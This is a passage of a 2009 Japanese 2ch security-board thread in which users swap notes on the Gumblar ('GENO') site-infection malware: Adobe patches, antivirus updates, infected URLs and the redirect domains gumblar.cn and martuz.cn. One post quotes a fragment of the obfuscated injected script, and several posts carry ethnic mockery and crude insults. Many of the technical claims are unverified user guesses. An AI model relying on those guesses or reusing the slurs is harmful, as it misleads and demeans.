821 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:25:21 ] ブラスターのときもそうだったけど ひとたび広がりだすと、亜種が出まくるので 現在OKであっても明日にどうなっているかわからん。 adobeを最新にしていれば大丈夫とあるが本当にそうと言い切れるか? 亜種があっさり突破できるレベルの改善なら一時凌ぎにしかならん。 それともadobeの今回の更新で根本的対処ができたという 確実な情報でも持っているのか?
822 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:25:25 ] windows updateが出来ないのはなんでだ? WMP11 IE8とかインストールできない
823 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:26:31 ] >>820 台風きたときのわくわく感とか感じたくてここに張り付いてる奴絶対いるなw
824 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:26:33 ] >>538 その前にPG2の使い方レクチャーしてくれ 誘導されたとこにいったら怒られた
825 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:26:42 ] どっかのアンチウイルスソフト業者がワクチンを無償配布しないものか…
826 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:27:01 ] とりあえず Adobe Reader 9.1.1 Adobe Flash Player 10 が最新でOK?
827 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:27:08 ] >>822 割れ厨はダウソへどうぞ
828 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:27:24 ] >>823 地震板に加えてウイルス板が
829 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:27:34 ] >>823 ドキッ!
830 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:27:38 ] www■ribbonmagic■com/ 確認。gumblar.cnへ飛ばすコードが2つ挿入されている。 >>324 に追加
831 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:27:40 ] >>826 カンブリア紀もんじゃね?
832 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:27:44 ] >>821 なんか勘違いしてないか? 現状で最新版のFlash PlayerとかAdobe Readerで問題が出たって話はないだろ。 亜種が問題になってるのは>>1 にあるような「わかりやすい症状」がどんどん変更されてるからじゃないのか?
833 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:27:44 ] >>822 感染しちゃってるからじゃね?
834 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:27:46 ] とにかくGENOは何らかの償いをするべきだ
835 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:28:05 ] ・sqlsodbc.chmは正常値(XP) ・数日前に突然explorer.exeが落ちた ・ウイルスバスターでスキャンしたら異常なし ・cmdとregeditは起動できる これはどう判断すればいいんだ
836 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:28:13 ] >>823 わくわく通り越してぐったりだよ・・・
837 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:28:15 ] お前ら実はこの状況を楽しんでるだろ?
838 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:28:32 ] ノートン新しい定義ファイル来たけどどうだろ?
839 名前:名無しさん@お腹いっぱい。 [2009/05/17(日) 00:28:45 ] >>821 絶対大丈夫なんて誰も保証できない。 今回だけじゃなくネットで遊んでれば何時だって危険に晒されてるのが 現状じゃ有るまいか? 今回はadobeを最新にするのがベストって事でそんなに木馬やウイルスが 怖いなら携帯でするしかないぜ。
840 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:28:51 ] >>835 サイトとかもってないんか
841 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:28:53 ] >>835 エクスプローラが落ちるのはWindowsなら良くある話
842 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:28:54 ] >>782 それ極論ね 少なくとも今回のはそれで防げるんだから それ以上の対策はないし 未来のウィルス防げるなウィルスなんて存在してないって。
843 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:29:10 ] >>837 …まあ
844 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:29:39 ] >>824 ttp://pc11.2ch.net/test/read.cgi/sec/1228949365/
845 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:29:43 ] >>842 もういいって。 寝なよ。疲れたろ。
846 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:30:10 ] >>835 台湾バスターは対応してませんが?
847 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:30:22 ] >>823 俺なんて目まいがして吐き気が出てる
848 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:30:31 ] >>840 昔(何年も前)持ってたけど今はない、でもffftpは入ったまま
849 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:30:33 ] >>721 "…\chrome.exe" --disable-javascript --disable-java --disable-plagin --user-agent="Mozilla/5.0 (Windows; U; Windows NT 6.0)"
850 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:30:46 ] >>821 もっともだと思うが、Adobeの脆弱性以外の経路まで疑いに入れると、それはもはや 任意の新規ウイルスに対する心構えをどうにかするってレベルと同じ話になってしまうと思われ。 そうなった場合、もはやこのスレに張り付く以外にも新規の脆弱性関連の速報の収集とか、 未知のゼロデイアタックに対する一般的な対処法の検討とか、いろいろやらなければならない事が多すぎる。
851 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:30:48 ] >>847 きみは豚の方だ
852 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:30:51 ] なんだこの改行厨 そんなに自分のレス目立たせたいのか 自己顕示欲の塊みたいなやつだなw それとも火消しに必死などっかの社員か?
853 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:30:52 ] >>477 改行豚は死んでこいや
854 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:30:59 ] 先生には優しいスレだな 今まで頼り切ってたからこれからもがんばってもらわないと困る
855 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:31:07 ] GENOにとってはかえって宣伝になってんじゃねえか。 だって名前さえ知らなかった奴のほうが多いだろ? いいか悪いかはともかく名前はずいぶん売れてるじゃんか。ほぼ2ch限定で。
856 名前:名無しさん@お腹いっぱい。 [2009/05/17(日) 00:31:08 ] >>835 explorerはウイルスじゃなくても割と落ちる
857 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:31:16 ] このウィルスを知らない人がどんどん感染していく始末
858 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:31:28 ] もうgenoウィルスで定着しただろ
859 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:32:14 ] バスターがGENOウイルスって命名してなかったか?
860 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:32:21 ] じぇの?
861 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:32:36 ] /゚ 。 ゚ヽ {___/ ,.-‐ 。 )'´ 豚 `ヽ. 大阪人アホやから 。__,′・ ・ ─- 。とりつきやすかったわ { ┌‐──┐ j、 .ゝ、 ̄ ̄ ̄_,ノ ヽ。 ゚´ 厂 ̄ } ぱんでみっく ゚ ゚ 大阪人由来で したろかー /゚ 。 /゚ 。 大阪弁になってしもたわ ゚ヽ {___/ ,.-‐ 。 ゚ヽ {___/ ,.-‐ 。 )'´ 豚 `ヽ. )'´ 豚 `ヽ. あほインフルエンザて呼んでや 。__,′・ ・ ─- 。 。__,′・ ・ ─- 。 { ┌‐──┐ j、 { ┌‐──┐ j、 .ゝ、 ̄ ̄ ̄_,ノ ヽ。 .ゝ、 ̄ ̄ ̄_,ノ ヽ。 ゚´ 厂 ̄ } ゚´ 厂 ̄ } ゚ ゚ ゚ ゚
862 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:32:43 ] >>848 まあexplorer落ちることよくあるんで大丈夫じゃないかね 感染サイト見たわけでもなさそうだしね
863 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:32:55 ] >>824 ほらよ、PG2の使い方紹介サイト ttp://ff11.my-sv.net/pg2/install.html ttp://lineage.paix.jp/guide/security/basic-ipfilter.html ttp://forum.gemini777.net/tutorials/pg_jp.php ttp://www.nicovideo.jp/watch/nm2825098
864 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:33:01 ] さて、下火になったことだし寝るかな
865 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:33:05 ] バスターなんか役に立つと思ってる奴マジで言ってんのかお?大爆笑
866 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:33:14 ] >>832 「これとこれさえ対策すれば全部OK!」なんて油断している奴を狙うのが今時のウイルスなんだがね。 ましてやここはセキュリティ板。未知の攻撃に警戒して何が悪い?
867 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:33:53 ] 大丈夫だろって言っている奴は こんなスレなんて無視すりゃいいだけだな
868 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:34:08 ] GENON ENESIS
869 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:34:09 ] 俺の火狐もよく落ちる でも感染して無いし怪しいとこ踏んでない
870 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:34:14 ] 感染報告ありの個人サイト持ちの対処として、(Winでxp、詳しい知識ない) pcの感染はないか確認 flashとかアップロード IEはjs無効にする サイトのhtml記述を確認 FFFTPはソフトごと削除 これでもう一度感染チェックして暫くpcごと開かなかったら、(ネットワーク遮断で利用する) 自衛とゾンビサイト化は防げるでFAと思っていい? 勿論、毎日このスレはROMする
871 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:34:18 ] UACはユーザーアカウントコントロールな……
872 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:34:24 ] このウイルスってパソコンだけ? ケータイも関係あるのかな
873 名前:名無しさん@お腹いっぱい。 [2009/05/17(日) 00:34:29 ] >>821 旧FlashやReaderの脆弱性を突いただけで 対策されたバージョンの穴を見つけることなんておいそれと出来ないよ まぁプログラムとか自分で組めない人はこんなもんか。
874 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:34:47 ] バスター厨は、どこの板から来たの?
875 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:34:52 ] 感染してるか気になる奴ってなんでウィルスチェックしないんだろう
876 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:34:54 ] リボンマジックは既にGoogle先生によって攻撃サイトとして登録済み また、ribbonmagicはgumblar.cnに飛ばすコードであり、現在のところgumblar.cnは応答しない ただしいつmartuz.cnに飛ばすコードに書き換えられるかわからないので注意
877 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:34:58 ] >>862 今のところは感染してないってことでいいのかな。サンクス
878 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:35:02 ] サイト管理者向けですが。 Troj/PHPMod-A: Behind the Troj/JSRedir-R attacks. (Sophos) ttp://www.sophos.com/blogs/sophoslabs/v/post/4422 HTMLだけじゃなくPHPもやられるので、借り物のPHPスクリプト (XOOPSとかMediaWikiとかPukiWikiとかphpBBとかvBulletinとかWordPressとか)を 中身も見ず・よくわからずに使ってる人は自分のサイトをちゃんと確認してね!
879 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:35:05 ] Yahoo!のトップにニュース出してくれよー
880 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:35:45 ] IEのjs無効ってどうやるの?
881 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:35:56 ] >>879 それくらいしてくれればいいんだけどね。 今は豚インフルでてんやわんやだから・・・
882 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:36:32 ] いや別にITニュースの枠は別にひとつくらい空けられるし ITmediaなりImpressなりが配信すれば一発だろ
883 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:36:39 ] >>880 ネットしなければ良いんだよ
884 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:37:28 ] そろそろ大阪は日本から独立すべきだな
885 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:37:46 ] 一般人はPCのウィルスより豚のほうが大事なんだろうな
886 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:37:55 ] www■senlights■co■jp/seihin/kirenaru-1s■htm このサイト感染するみたいだし、誰かVmwareで動作試験しといてよ PDFやフラッシュでのバージョンごとの感染の確認や、sqlsodbc.chm改変の有無 感染後にカスぺで本当に検出できるかどうか
887 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:38:03 ] >>880 セキュリティのカスタマイズ ついでにActiveXも切っておけ Java関係とActiveXを切って安心と思ったけど、 画像見ただけで感染するタイプのウイルスあったよね?
888 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:38:06 ] だからぁw おまえら踊らされすぎ Adobe関連を最新版にしとけば 普段の生活でいんだって。 煽り厨うざいわ
889 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:38:08 ] サイズもハッシュも違ったから感染してるんだろうけど その他の症状が出ないんだよなあ 再起動怖くてできない
890 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:38:11 ] sage方も知らんやつが なんか偉そうなこと言うてるで^^;
891 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:38:24 ] >>886 言い出しっぺの法則
892 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:38:27 ] >>885 職場以外でPC触らない人ならそんなもんだろ
893 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:38:34 ] ・自転車の前カゴに財布 ・磁気キャッシュカード ・パスワードは生年月日 ・暗号化なしで無線LAN 平和な日本! PCにマルウェア仕込まれるくらい何でもないぜ!
894 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:38:42 ] >>886 用意できたらいくわ
895 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:38:49 ] >>870 別にFTP接続ソフトを削除する必要は無いよ。 起動して接続しなければいい。
896 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:38:50 ] _,. -―――- 、 /: : ‐: : : : : : :‐- 、: :\ /: : /: : : : : : :\: : : : \: :\ /: :/: :.|: : : : : ! : : : \: : : :.ヽ: : ヽ /: /: : 八: :!: : :|\: : : : ヽ: : : :',: : :.', ,': /ニ7⌒!:.!: : :| ⌒ : : : : : : : : |: : : :! /: :.|: :./ V\: ! ヽ: :!: :.|\|: : : :.\__, /: : :ハ: :| ヾ ∨!∨: : : : : : : : :ヽ /: : : : :.V:! x=ミ x=ミ. !: : : : ハ: : : : : :.ハ /:/: : : : /: :! 、、 、 、、 !: : !: : :!: : : : : : :.} // |: : : /| :八 - 、 ,ィ: :/: : /: :ハ: : :|V {! 从: i'´ ̄::::>、 `ー ' イ!V /: : /: / |: :/ _人_ /N::::_:::::/::| ` r ' //:/: /‐く V Kaspersky♪ Kaspersky♪ `Y´ /::::::://:::/:::::| >< /:::丁´:::::::::::::V゚}∩ * /::::nんh_::∧:::::}/八. ∨::::::」::::::::::〈ヽ.ノ///〉 . /:/| ! // 〉:::::>ヘ.ノ八 ソ::::{::::::::::::/:::} っ //:::::::\__ノ〉::〈:::::::|/ ∧〉::::〉::::::::/::::∧ , ィ´ /:::::::::::::::::::::/::::::::\::! /:::::>'´::::::::/::::/:::い.ノ):〉 !:::::::::::::::::::/:::::::::::::::::ヾ厶イ:::::::::::::/:::/:::::::ヽノ:/ |::::::::::::::/ヽ:::::::::::::::<>:::::::::::::::::::/ |:::::::::::::::::::/ * `ー七:::::::::::::::::::::::::::::::::::::::::::::::::/ |:::::::::::::::::/ //:::::::::::::::::::::::<>::::::::::/::::/ ヽ:::::::::::/ /⌒〈:::::::::::::::::::::::::::::::::::イ::::::::/ `ー‐' *
897 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:38:53 ] vistaでの感染は0ですか?
898 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:39:27 ] >>888 そうやって安心したいのはわかる とりあえずもう一度完全スキャンやり直せ 引っかかったらPC叩き壊せ
899 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:40:26 ] 質問してくるやつは、まずスキャンしろよ
900 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:40:51 ] >>896 ゆいぃいいいいいいいいいいいいいいいいいいいいいいいいいいいいいいいいいいいいいいい
901 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:40:56 ] >>892 職場のPCでネットサーフィンしまくってる奴いるんだが大丈夫だろうか
902 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:41:17 ] >>894 頼んだ。 sqlsodbc.chm改変の有無、感染後にカスぺで本当に検出できるかどうか 上記2つが事実でなかったらテンプレの対策意味なくなるしな
903 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:41:33 ] >>896 そんなのに萌えてる余裕は無い 感染してたらもうダメなんだろうな…
904 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:41:37 ] Youtubeとか動画サイトがやられると困るので、 中の人はセキュリティの見直しお願いします
905 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:41:56 ] >>897 UAC機能無効にしてたらアウト JaneStyleの作者がUAC無効にしろとか狂ったこと言い放ってたから (銭ブラがVistaに対応してないという指摘への暫定対処らしいが未だに暫定のまま) 鵜呑みにして設定変えちゃってる奴も少なくないだろう
906 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:42:02 ] >>873 ただ怖いのは、FlashやAdobe Readerの脆弱性狙いの効果が薄れたら 動作を止めておとなしくしているかもしれないってこと。 で、新たな脆弱性が見つかったら活動再開。
907 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:42:03 ] >>893 今どきそんなATMスペックで街中闊歩してるのは情弱のバカくらいしかいないだろ うわああああああバカだらけだ日本www
908 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:42:17 ] 雨降ってきたな
909 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:42:22 ] >>901 この実話教えてやれよ 50 名前: ヒマラヤユキノシタ(コネチカット州)[] 投稿日:2009/04/06(月) 00:33:18.70 ID:8fz7e8f5 リアルにPCやられた。IEが強制終了される。しばらくZIPはふむな。 162 名前: ヒマラヤユキノシタ(コネチカット州)[] 投稿日:2009/04/06(月) 01:05:12.95 ID:8fz7e8f5 ああ本当に壊れた 再インストールすらさせてもらえない 何かしようとしても強制終了される。 204 名前: ヒマラヤユキノシタ(コネチカット州)[] 投稿日:2009/04/06(月) 01:15:09.39 ID:8fz7e8f5 》167ありがとうございます けど駄目でした。 今遠隔サービスで見て貰っていますがソフト入れ替えと言われた。会社のPCでZIP落としていた罰が当たりました。日曜出動までして何してんだろ俺?もう帰宅します。明日上司になんて説明しようか? 995 名前: ヒマラヤユキノシタ(コネチカット州)[] 投稿日:2009/04/06(月) 09:53:37.05 ID:8fz7e8f5 会社のPCでZIP落としてるのばれた。 本当に死にたい。 144 名前: ケンタウレア・モンタナ(コネチカット州)[] 投稿日:2009/04/06(月) 10:55:46.05 ID:8fz7e8f5 自宅謹慎になったわ 940 名前: ミツマタ(東京都)[] 投稿日:2009/04/06(月) 18:04:22.10 ID:AhXwTJEf ID:8fz7e8f5 ですが自宅のPCから書き込み 自主退社という形になりました 逝ってきます このウイルスが世界中に広がりますように 55 名前: ミツマタ(東京都)[] 投稿日:2009/04/06(月) 18:35:10.80 ID:AhXwTJEf 釣りだと思われるのはしゃくなので IEの強制終了のせいで発注できず ウイルスの原因が2CHでエロZIp PCと自前のHDD回収される 生き恥をさらす 大量のロリ画像で性犯罪者扱い どぷするの?と上司 自主退社←今ここ このスレに気づかずに管理人に連絡とったのが悔やまれる
910 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:42:26 ] ええと、例の乙女ゲーのURLをチェッカーに放り込んだんだが、 <script language=javascript><!-- (function(){var goC='%';var xouq='<76<61<72<20a<3d<22<53<63<... って感じで意味不明な値がずっと続いてる場合感染してる、でおk?
911 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:42:29 ] >>901 まず社会人としてアウトだろ
912 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:42:32 ] >>903 人生が終わるわけでもなかろうに 個人情報は抜き取られるけど
913 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:42:39 ] >>903 げんじつとうひという希望がある
914 名前:名無しさん@お腹いっぱい。 [2009/05/17(日) 00:42:43 ] >>901 かなりヤバイかもね〜 ・・・と会社のPCから書き込んでみる
915 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:43:05 ] >>901 たぶんPCの管理者が死ぬ
916 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:43:12 ] 基本的にセキュ板は トイレのドアノブにばい菌があるからハンカチ使って空けるような潔癖症のキチガイの集まりだから 一般の人は FlashとReaderを最新版に これだけでいいよ 無駄に不安煽るのが ここのクズどもだから
917 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:43:29 ] sqlsodbc.chmってファイル何なの? 拡張子はヘルプ関係らしいが・・・ 消しちゃダメかな?
918 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:43:39 ] >>909 よし明日にでも教えるわ
919 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:43:41 ] もう900超えたのか・・・
920 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:43:53 ] >>734 Adobe Flash Playerを使わない も追加しないとマズイのでは?
921 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:43:53 ] >>916 なんでそんな必死なん
922 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:43:56 ] >>905 どうやったら無効にできるかわからないし そもそも今現在有効なのかすらわからない… どこを見たらいいの?
923 名前:名無しさん@お腹いっぱい。 [2009/05/17(日) 00:44:06 ] ノートン更新来た GENO対応したか?
924 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:44:45 ] >>922 ええーそんなレベルでネットやってるんですかぁー
925 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:44:48 ] セキュ板民を煽ってるのにセキュ板で書き込みしてるやつって馬鹿なの?
926 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:45:09 ] ウイルスバスターの更新はまだか?
927 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:45:25 ] >>681 この状態で一週間後?想像したくもないわ
928 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:45:56 ] >>916 とかなんとか言いながら、自分はしっかりと マスクと食品備蓄して対策しているんだろ!
929 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:46:00 ] >>922 知らないんならいじってないってことだろ
930 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:46:04 ] しばらくネットは携帯からだな…
931 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:46:06 ] >>926 >>●365日、毎日9:00〜24:00まで対応! (#`ハ´)答えは全て「サイインストールスル アル」 >>●パソコン、メール、周辺機器などの面倒な設定、変更をサポート! (#`ハ´)VB不具合無いアル、不具合周辺機器せいアル。周辺機器メーカーへ問い合わせるアル >>●パソコン、メール、インターネット関連のトラブルに対応! (#`ハ´)VB不具合無いアル、お使いのパソコンメーカー、プロバイダーに問い合わせるアル >>●パソコン、アプリケーション、周辺機器など基本的な操作方法をサポート! (#`ハ´)VB不具合無いアルから、お使いのパソコンメーカーに問い合わせるアル >>●ハードウェアの故障の場合は、トラブルを切り分けし、メーカサポートをご案内 (#`ハ´)切り分ける能力無いアル。VB不具合全部ハードのせいアルネ >>●電話でわからない場合は、リモート(遠隔操作)で対応も!!で解決!! (#`ハ´)msconfigでスタートアップ・サービス全止め→再起動、なおらなければサイインストール アル
932 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:46:17 ] >>922 そんな状態なら無効にして無いのかもな
933 名前:名無しさん@お腹いっぱい。 [2009/05/17(日) 00:46:19 ] Norton先生はさっきからひっきりなしに更新してるわ
934 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:46:24 ] >>926 まだ来てないっぽい
935 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:46:29 ] >>922 おまw UACでググれよ
936 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:46:44 ] このスレ以外インターネットのどこでも盛り上がってないけど、 これって達の悪いジョークとかじゃないの???
937 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:47:02 ] >>905 凄いなそれ。OS標準の保護を無効にさせるアプリケーションかよ。 UACがそういうアプリを駆逐してくれるはずなんだがなあ。 >>916 まあまあ、別にハンカチでドアノブ掴んだっていいじゃねえか。 キレイ好きなのは悪いことじゃないだろ。とりあえず手洗わない奴多すぎだし。
938 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:47:05 ] >>917 sqlsodbc.chmが改変されるのはウィルスがバージョンチェックの目印にしてるだけっぽいから 既に感染していたり他の所にチェックを入れるウィルスの亜種だと意味無いのでは?
939 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:47:18 ] live one careはのんびりやで〜
940 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:47:20 ] >>936 このスレよりもっと盛り上がってるところが別にあるけどね。
941 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:47:27 ] ファミ
942 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:47:28 ] >>924 すいません >>929 そういうものなんですか たまに盾みたいなアイコンが出るあれがそうですか?
943 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:47:34 ] >>934 そう…ありがとう…なんか辛いよ…
944 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:48:01 ] >>936 おまえのインターネットって、ずいぶん狭い世界なんだな
945 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:48:00 ] 我らがavastさんはまだか!
946 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:48:08 ] >>907 アメリカいったら発狂するぞw
947 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:48:17 ] >>941 途中送信しちまった ファミ通も感染したらしいしやばいな
948 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:48:30 ] >>905 JaneStyle使いは負け組みケテーイ
949 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:48:49 ] >>936 じゃあ感染URL踏んでらっしゃい
950 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:49:01 ] ノートンのさっきの更新がこれに対応したものなのかどうか 試そうにも違ったら困るので試せないw
951 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:49:02 ] >>945 なんかavast!さん結構前から入ってるとか聞いたけど
952 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:49:13 ] 一回でもいいのでTVで報道してくれないものか
953 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:49:23 ] >>947 スレ嫁よ 確認した奴が感染してないっていってるだろ
954 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:49:23 ] >>947 してませんが
955 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:49:27 ] >>936 ジョークなら良かったのにね つかJaneの作者UAC切れとか言ってたんだ 気づかなかったけどVistaで普通に使えてたw あー気づかなくて良かったあああ
956 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:49:29 ] >>947 それデマ
957 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:49:31 ] カスペ更新キタ
958 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:49:45 ] 先生ならあるいはまた日付だけの更新やもしれぬ・・・!
959 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:50:08 ] お? ノートンまた更新キタのか でも概略じゃ内容がサッパリわからないぜ
960 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:50:16 ] 先生更新きたけど、これ関連の更新なのかがわかんねぇw
961 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:50:28 ] >>950 さっきの・・・?
962 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:50:33 ] 先生が真の力を発揮するのは再起動を要求する時だけ
963 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:50:33 ] >>715 うしろ薄暗くなって許可かキャンセルかの警告出る。 ソフトによってはUACの所為で起動時糞重くなったり(韓国製FPSとかでよくある)するから切ってる奴多数
